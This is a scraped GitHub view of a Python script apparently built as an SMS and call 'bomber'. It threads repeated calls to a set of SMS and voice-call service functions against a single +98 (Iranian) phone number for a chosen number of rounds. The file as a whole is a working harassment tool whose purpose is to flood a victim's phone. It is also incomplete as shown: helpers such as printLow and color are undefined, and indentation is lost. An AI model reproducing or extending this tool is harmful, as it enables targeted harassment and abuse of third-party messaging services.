-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathmain.py
33 lines (29 loc) · 1.11 KB
/
main.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
from threading import Thread
from Api import sms, call
from time import sleep
from inspect import getmembers, isfunction
from os import system, name
SMS_SERVICES = list(i[0] for i in getmembers(sms, isfunction))
CALL_SERVICES = list(i[0] for i in getmembers(call, isfunction))
def bombing(phone, count):
x = 0
phone = f"+98{phone[1:]}"
for j in range(count):
for k in range(len(SMS_SERVICES)):
Thread(target=getattr(sms, SMS_SERVICES[k]), args=[phone]).start()
if (j !=0) and (j % 5) == 0:
Thread(target=getattr(call, CALL_SERVICES[x]), args=[phone]).start()
x += 1
if x > len(CALL_SERVICES) - 1:
x = 0
print(f"Round {j+1} Completed XD")
sleep(0.2)
printLow("Finish")
if __name__ == "__main__":
num = input(color.wormy +'''***Enter your phone [-98:]
[number:0999*******]---> : ''')
yy = int(input("***Enter The Count of Round of Bombing -#>"))
system('clear' if name == 'posix' else 'cls')
printLow("*Phone Number:{}\n*Rounds: {}\n\n".format(num,yy))
printLow("Start\n")
bombing(phone=num,count=yy)